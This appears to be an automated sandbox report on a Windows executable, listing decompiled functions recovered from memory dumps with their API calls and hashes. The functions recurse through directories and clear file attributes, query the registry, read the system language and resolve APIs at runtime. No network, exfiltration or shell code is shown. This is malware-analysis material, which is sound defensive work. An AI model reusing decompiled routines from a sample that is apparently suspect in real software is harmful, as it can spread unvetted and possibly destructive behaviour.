								_t106 = E0060C664(_v17 & 0x000000ff, _v24, __eflags); // executed
								__eflags = _t106;
								if(_t106 == 0) {
									_v26 = 0;
								}
							} else {
								_t108 = _a12();
								__eflags = _t108;
								if(_t108 == 0) {
									_v26 = 0;
								}
							}
						}
					}
					__eflags = 0;
					_pop(_t177);
					 *[fs:eax] = _t177;
					_push(E0060DF6D);
					E0040A228( &_v640, 4);
					return E0040A228( &_v16, 3);
				} else {
					_t205 = _v25;
					if(_v25 == 0) {
						L3:
						_t207 = _v25;
						if(_v25 == 0) {
							E005C5428(_v24, _t159,  &_v8);
							E0040A5F0( &_v12, _v24);
						} else {
							E005C4EA4(_v24,  &_v8);
							E0040B4C8( &_v12, 0x60df84, _v8);
						}
						_t114 = E0060C2B0(_v17 & 0x000000ff,  &_v624, _v12, _t207); // executed
						_v32 = _t114;
						if(_v32 == 0xffffffff) {
							goto L26;
						} else {
							_push(_t201);
							_push(0x60def2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t203;
							do {
								E0040B318( &_v16, 0x104,  &(_v624.cFileName));
								E0040B660(_v16, 0x60df94);
								if(0 != 0) {
									_t127 = E0040B660(_v16, 0x60dfa4);
									if(0 != 0) {
										_t158 = _v624.dwFileAttributes;
										if((_t158 & 0x00000001) != 0 && (_t127 & 0xffffff00 | (_t158 & 0x00000010) == 0x00000000 | _a20) != 0) {
											E0040B4C8( &_v628, _v16, _v8);
											E0060C6DC(_v17 & 0x000000ff, _t158 & 0xfffffffe, _v628, _t158 & 0xfffffffe);
										}
										if((_v624.dwFileAttributes & 0x00000010) != 0) {
											__eflags = _a20;
											if(_a20 != 0) {
												E0040B4C8( &_v640, _v16, _v8);
												_t135 = E0060DCC8(_v17 & 0x000000ff, _t158, 1, _v640, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1); // executed
												__eflags = _t135;
												if(_t135 == 0) {
													_v26 = 0;
												}
											}
										} else {
											if(_a8 == 0) {
												E0040B4C8( &_v636, _v16, _v8);
												_t139 = E0060C158(_v17 & 0x000000ff, _v636, __eflags);
												__eflags = _t139;
												if(_t139 == 0) {
													_v26 = 0;
												}
											} else {
												E0040B4C8( &_v632, _v16, _v8);
												if(_a8() == 0) {
													_v26 = 0;
												}
											}
										}
									}
								}
								if(_a16 == 0 || _v26 != 0) {
									goto L24;
								}
								break;
								L24:
								_t122 = FindNextFileW(_v32,  &_v624); // executed
							} while (_t122 != 0);
							_pop(_t187);
							 *[fs:eax] = _t187;
							_push(E0060DEF9);
							return FindClose(_v32);
						}
					} else {
						_t155 = E0060C474(_v17 & 0x000000ff, _v24, _t205); // executed
						if(_t155 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
			}






























                                                                    0x0060dcc8
                                                                    0x0060dcc9
                                                                    0x0060dccb
                                                                    0x0060dcd1
                                                                    0x0060dcd4
                                                                    0x0060dcda
                                                                    0x0060dce0
                                                                    0x0060dce6
                                                                    0x0060dcec
                                                                    0x0060dcef
                                                                    0x0060dcf2
                                                                    0x0060dcf5
                                                                    0x0060dcf8
                                                                    0x0060dcfb
                                                                    0x0060dd00
                                                                    0x0060dd01
                                                                    0x0060dd06
                                                                    0x0060dd09
                                                                    0x0060dd0c
                                                                    0x0060dd14
                                                                    0x0060def9
                                                                    0x0060deff
                                                                    0x0060df02
                                                                    0x0060df04
                                                                    0x0060df08
                                                                    0x0060df0a
                                                                    0x0060df0e
                                                                    0x0060df2e
                                                                    0x0060df33
                                                                    0x0060df35
                                                                    0x0060df37
                                                                    0x0060df37
                                                                    0x0060df10
                                                                    0x0060df1a
                                                                    0x0060df1d
                                                                    0x0060df1f
                                                                    0x0060df21
                                                                    0x0060df21
                                                                    0x0060df1f
                                                                    0x0060df0e
                                                                    0x0060df08
                                                                    0x0060df3b
                                                                    0x0060df3d
                                                                    0x0060df40
                                                                    0x0060df43
                                                                    0x0060df53
                                                                    0x0060df65
                                                                    0x0060dd1a
                                                                    0x0060dd1a
                                                                    0x0060dd1e
                                                                    0x0060dd34
                                                                    0x0060dd34
                                                                    0x0060dd38
                                                                    0x0060dd5d
                                                                    0x0060dd68
                                                                    0x0060dd3a
                                                                    0x0060dd40
                                                                    0x0060dd50
                                                                    0x0060dd50
                                                                    0x0060dd7a
                                                                    0x0060dd7f
                                                                    0x0060dd86
                                                                    0x00000000
                                                                    0x0060dd8c
                                                                    0x0060dd8e
                                                                    0x0060dd8f
                                                                    0x0060dd94
                                                                    0x0060dd97
                                                                    0x0060dd9a
                                                                    0x0060dda8
                                                                    0x0060ddb5
                                                                    0x0060ddba
                                                                    0x0060ddc8
                                                                    0x0060ddcd
                                                                    0x0060ddd3
                                                                    0x0060dddc
                                                                    0x0060ddf5
                                                                    0x0060de09
                                                                    0x0060de09
                                                                    0x0060de15
                                                                    0x0060de72
                                                                    0x0060de76
                                                                    0x0060de99
                                                                    0x0060deaa
                                                                    0x0060deaf
                                                                    0x0060deb1
                                                                    0x0060deb3
                                                                    0x0060deb3
                                                                    0x0060deb1
                                                                    0x0060de17
                                                                    0x0060de1b
                                                                    0x0060de54
                                                                    0x0060de63
                                                                    0x0060de68
                                                                    0x0060de6a
                                                                    0x0060de6c
                                                                    0x0060de6c
                                                                    0x0060de1d
                                                                    0x0060de29
                                                                    0x0060de40
                                                                    0x0060de42
                                                                    0x0060de42
                                                                    0x0060de40
                                                                    0x0060de1b
                                                                    0x0060de15
                                                                    0x0060ddcd
                                                                    0x0060debb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060dec3
                                                                    0x0060dece
                                                                    0x0060ded3
                                                                    0x0060dedd
                                                                    0x0060dee0
                                                                    0x0060dee3
                                                                    0x0060def1
                                                                    0x0060def1
                                                                    0x0060dd20
                                                                    0x0060dd27
                                                                    0x0060dd2e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060dd2e
                                                                    0x0060dd1e

                                                                    APIs
                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                                    • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileNext
                                                                    • String ID:
                                                                    • API String ID: 2066263336-0
                                                                    • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                                    • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                                    • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                                    • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E005C77F4(void* __eax, void* __ebx, intOrPtr __ecx, short* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				short* _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				long _t46;
				signed int _t58;
				char _t66;
				intOrPtr _t82;
				void* _t87;
				signed int _t93;
				void* _t96;

				_v8 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_t87 = __eax;
				_push(_t96);
				_push(0x5c792a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96 + 0xffffffec;
				while(1) {
					_v24 = 0;
					_t46 = RegQueryValueExW(_t87, _v12, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 != 0 || _v20 != _a8 && _v20 != _a4) {
						break;
					}
					if(_v24 != 0) {
						__eflags = _v24 - 0x70000000;
						if(__eflags >= 0) {
							E00428FFC();
						}
						_t80 = _v24 + 1 >> 1;
						E0040A350( &_v8, _v24 + 1 >> 1, 0, __eflags);
						_t58 = RegQueryValueExW(_t87, _v12, 0,  &_v20, E0040A774( &_v8),  &_v24); // executed
						__eflags = _t58 - 0xea;
						if(_t58 == 0xea) {
							continue;
						} else {
							__eflags = _t58;
							if(_t58 != 0) {
								break;
							}
							__eflags = _v20 - _a8;
							if(_v20 == _a8) {
								L12:
								_t93 = _v24 >> 1;
								while(1) {
									__eflags = _t93;
									if(_t93 == 0) {
										break;
									}
									_t66 = _v8;
									__eflags =  *((short*)(_t66 + _t93 * 2 - 2));
									if( *((short*)(_t66 + _t93 * 2 - 2)) == 0) {
										_t93 = _t93 - 1;
										__eflags = _t93;
										continue;
									}
									break;
								}
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										_t93 = _t93 + 1;
										__eflags = _t93;
									}
								}
								E0040B3F0( &_v8, _t80, _t93);
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										(E0040A774( &_v8))[_t93 * 2 - 2] = 0;
									}
								}
								E0040A5A8(_v16, _v8);
								break;
							}
							__eflags = _v20 - _a4;
							if(_v20 != _a4) {
								break;
							}
							goto L12;
						}
					} else {
						E0040A1C8(_v16);
						break;
					}
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E005C7931);
				return E0040A1C8( &_v8);
			}















                                                                    0x005c77ff
                                                                    0x005c7802
                                                                    0x005c7805
                                                                    0x005c7808
                                                                    0x005c780c
                                                                    0x005c780d
                                                                    0x005c7812
                                                                    0x005c7815
                                                                    0x005c781a
                                                                    0x005c781c
                                                                    0x005c7830
                                                                    0x005c7837
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c7855
                                                                    0x005c7866
                                                                    0x005c786d
                                                                    0x005c786f
                                                                    0x005c786f
                                                                    0x005c787d
                                                                    0x005c7881
                                                                    0x005c789e
                                                                    0x005c78a3
                                                                    0x005c78a8
                                                                    0x00000000
                                                                    0x005c78ae
                                                                    0x005c78ae
                                                                    0x005c78b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78b5
                                                                    0x005c78b8
                                                                    0x005c78c2
                                                                    0x005c78c5
                                                                    0x005c78ca
                                                                    0x005c78ca
                                                                    0x005c78cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78ce
                                                                    0x005c78d1
                                                                    0x005c78d7
                                                                    0x005c78c9
                                                                    0x005c78c9
                                                                    0x00000000
                                                                    0x005c78c9
                                                                    0x00000000
                                                                    0x005c78d7
                                                                    0x005c78d9
                                                                    0x005c78dd
                                                                    0x005c78df
                                                                    0x005c78e1
                                                                    0x005c78e3
                                                                    0x005c78e3
                                                                    0x005c78e3
                                                                    0x005c78e1
                                                                    0x005c78e9
                                                                    0x005c78ee
                                                                    0x005c78f2
                                                                    0x005c78f4
                                                                    0x005c78f6
                                                                    0x005c7900
                                                                    0x005c7900
                                                                    0x005c78f6
                                                                    0x005c790d
                                                                    0x00000000
                                                                    0x005c7912
                                                                    0x005c78bd
                                                                    0x005c78c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78c0
                                                                    0x005c7857
                                                                    0x005c785a
                                                                    0x00000000
                                                                    0x005c785f
                                                                    0x005c7855
                                                                    0x005c7916
                                                                    0x005c7919
                                                                    0x005c791c
                                                                    0x005c7929

                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                    • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                                    • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                    • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005D0A74, Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E005D0A74(intOrPtr* __eax, void* __eflags, void* __fp0) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t68;
				int _t72;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t94;
				void* _t102;
				intOrPtr _t103;
				intOrPtr _t111;
				void* _t113;
				int _t114;
				void* _t116;
				void* _t121;
				void* _t123;
				intOrPtr _t124;
				void* _t126;

				_t126 = __eflags;
				_t121 = _t123;
				_t124 = _t123 + 0xffffffe8;
				_push(_t89);
				_push(_t116);
				_push(_t113);
				_v8 = __eax;
				_t94 =  *0x6cdb9c; // 0x6d66b8
				_t2 = _t94 + 0x2c; // 0x8
				_t103 =  *0x6cdb9c; // 0x6d66b8
				_t3 = _t103 + 8; // 0x0
				E005CE198( *((intOrPtr*)(_v8 + 0x74)), _t89,  *_t2,  *_t3, _t113, _t116, __fp0, 8, 0); // executed
				E005CE26C( *((intOrPtr*)(_v8 + 0x74)), _t89, _v8 + 0x3d4, _v8 + 0x3d0, _t113, _t116, _t126); // executed
				if( *(_v8 + 0x3d0) != 6) {
					L2:
					_v12 = E005D10C4(0, 1, _t113);
					 *[fs:eax] = _t124;
					E005D0564(_v8, _v12);
					E005CE3FC(_v8, 6,  *(_v8 + 0x3d0), _t128, 0xd,  *(_v8 + 0x3d4));
					 *((intOrPtr*)( *_v8 + 0x70))( *[fs:eax], 0x5d0bae, _t121);
					_t114 = _v20;
					_t68 = MulDiv(_t114,  *(_v8 + 0x3d0), 6);
					_t72 = MulDiv(_v16,  *(_v8 + 0x3d4), 0xd);
					E005AE564(_v8);
					 *((intOrPtr*)( *_v8 + 0xc8))(E005AE584(_v8), _t72 +  *((intOrPtr*)(_v8 + 0x5c)) - _v16, _t68 +  *((intOrPtr*)(_v8 + 0x58)) - _t114);
					_pop(_t111);
					_pop(_t102);
					 *[fs:eax] = _t111;
					_push(E005D0BB5);
					return E005D05DC( *_v8, _t102, _v12, 0);
				} else {
					_t88 = _v8;
					_t128 =  *((intOrPtr*)(_t88 + 0x3d4)) - 0xd;
					if( *((intOrPtr*)(_t88 + 0x3d4)) == 0xd) {
						return _t88;
					} else {
						goto L2;
					}
				}
			}



























                                                                    0x005d0a74
                                                                    0x005d0a75
                                                                    0x005d0a77
                                                                    0x005d0a7a
                                                                    0x005d0a7b
                                                                    0x005d0a7c
                                                                    0x005d0a7d
                                                                    0x005d0a84
                                                                    0x005d0a8a
                                                                    0x005d0a8d
                                                                    0x005d0a93
                                                                    0x005d0a9c
                                                                    0x005d0ab9
                                                                    0x005d0ac8
                                                                    0x005d0ada
                                                                    0x005d0ae8
                                                                    0x005d0af6
                                                                    0x005d0aff
                                                                    0x005d0b21
                                                                    0x005d0b2e
                                                                    0x005d0b3d
                                                                    0x005d0b41
                                                                    0x005d0b58
                                                                    0x005d0b82
                                                                    0x005d0b8f
                                                                    0x005d0b97
                                                                    0x005d0b99
                                                                    0x005d0b9a
                                                                    0x005d0b9d
                                                                    0x005d0bad
                                                                    0x005d0aca
                                                                    0x005d0aca
                                                                    0x005d0acd
                                                                    0x005d0ad4
                                                                    0x005d0bbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005d0ad4

                                                                    APIs
                                                                      • Part of subcall function 005CE26C: GetDC.USER32(00000000), ref: 005CE27D
                                                                      • Part of subcall function 005CE26C: SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                                      • Part of subcall function 005CE26C: GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                                      • Part of subcall function 005CE26C: GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                                      • Part of subcall function 005CE26C: ReleaseDC.USER32 ref: 005CE2F2
                                                                    • MulDiv.KERNEL32(006B66BF,00000006,00000006), ref: 005D0B41
                                                                    • MulDiv.KERNEL32(?,?,0000000D), ref: 005D0B58
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                                    • String ID:
                                                                    • API String ID: 844173074-0
                                                                    • Opcode ID: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                                    • Instruction ID: 4b3286446c155bbe1f679e64263f80cdfde84c69ba5731eb2fff00bff0d4e1b0
                                                                    • Opcode Fuzzy Hash: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                                    • Instruction Fuzzy Hash: 8F41E735A00108EFDB00DBA8D986EADB7F9FB88704F1541A6F904EB361D771AE41DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E0040E8BC(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				E0040A2AC(_v12);
				_push(_t84);
				_push(0x40e9d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E0040A1C8(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040E9DA);
					return E0040A228( &_v28, 6);
				}
				E0040A5F0( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040E5E0(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L0040524C();
						E0040DF90(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040E70C(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x6d1c10;
							if( *0x6d1c10 == 0) {
								L00405254();
								E0040DF90(_t46, _t60,  &_v28, _t79, _t81);
								E0040E70C(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040E7F0(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040E70C(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E0040B698(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                    0x0040e8bc
                                                                    0x0040e8bc
                                                                    0x0040e8bf
                                                                    0x0040e8c1
                                                                    0x0040e8c3
                                                                    0x0040e8c5
                                                                    0x0040e8c7
                                                                    0x0040e8c9
                                                                    0x0040e8cb
                                                                    0x0040e8cc
                                                                    0x0040e8cd
                                                                    0x0040e8cf
                                                                    0x0040e8d2
                                                                    0x0040e8d8
                                                                    0x0040e8e0
                                                                    0x0040e8e7
                                                                    0x0040e8e8
                                                                    0x0040e8ed
                                                                    0x0040e8f0
                                                                    0x0040e8f5
                                                                    0x0040e8fe
                                                                    0x0040e9b8
                                                                    0x0040e9ba
                                                                    0x0040e9bd
                                                                    0x0040e9c0
                                                                    0x0040e9d2
                                                                    0x0040e9d2
                                                                    0x0040e90a
                                                                    0x0040e90f
                                                                    0x0040e914
                                                                    0x0040e919
                                                                    0x0040e919
                                                                    0x0040e91b
                                                                    0x0040e920
                                                                    0x0040e947
                                                                    0x0040e94d
                                                                    0x0040e956
                                                                    0x0040e967
                                                                    0x0040e96f
                                                                    0x0040e97c
                                                                    0x0040e981
                                                                    0x0040e984
                                                                    0x0040e986
                                                                    0x0040e98d
                                                                    0x0040e98f
                                                                    0x0040e997
                                                                    0x0040e9a4
                                                                    0x0040e9a4
                                                                    0x0040e98d
                                                                    0x0040e9a9
                                                                    0x0040e9ac
                                                                    0x0040e9b3
                                                                    0x0040e9b3
                                                                    0x0040e958
                                                                    0x0040e960
                                                                    0x0040e960
                                                                    0x00000000
                                                                    0x0040e956
                                                                    0x0040e922
                                                                    0x0040e942
                                                                    0x0040e943
                                                                    0x0040e945
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e945
                                                                    0x0040e931
                                                                    0x0040e93b
                                                                    0x00000000

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                    • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                                    • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                    • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414020, Relevance: 3.1, APIs: 2, Instructions: 57libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E00414020(void* __ebx, void* __esi, struct HINSTANCE__* _a4, CHAR* _a8) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _t22;
				CHAR* _t31;
				intOrPtr _t38;
				intOrPtr _t39;
				struct HINSTANCE__* _t41;
				void* _t43;
				void* _t44;
				intOrPtr _t45;

				_t43 = _t44;
				_t45 = _t44 + 0xfffffff8;
				_v8 = 0;
				_t31 = _a8;
				_t41 = _a4;
				_push(_t43);
				_push(0x4140be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				if(_t31 >> 0x10 != 0) {
					_push(_t43);
					 *[fs:eax] = _t45;
					E0040A1EC( &_v8);
					E0040A944( &_v8, 0, _t31,  *[fs:eax]);
					_t22 = GetProcAddress(_t41, E0040AC70(_v8)); // executed
					_v12 = _t22;
					_t38 = 0x4140a1;
					 *[fs:eax] = _t38;
					_push(E004140A8);
					return E0040A1EC( &_v8);
				} else {
					_v12 = GetProcAddress(_t41, _t31);
					_pop(_t39);
					 *[fs:eax] = _t39;
					_push(E004140C5);
					return E0040A1EC( &_v8);
				}
			}













                                                                    0x00414021
                                                                    0x00414023
                                                                    0x0041402a
                                                                    0x0041402d
                                                                    0x00414030
                                                                    0x00414035
                                                                    0x00414036
                                                                    0x0041403b
                                                                    0x0041403e
                                                                    0x00414046
                                                                    0x00414056
                                                                    0x0041405f
                                                                    0x00414065
                                                                    0x00414074
                                                                    0x00414083
                                                                    0x00414088
                                                                    0x0041408d
                                                                    0x00414090
                                                                    0x00414093
                                                                    0x004140a0
                                                                    0x00414048
                                                                    0x0041404f
                                                                    0x004140aa
                                                                    0x004140ad
                                                                    0x004140b0
                                                                    0x004140bd
                                                                    0x004140bd

                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00414083
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
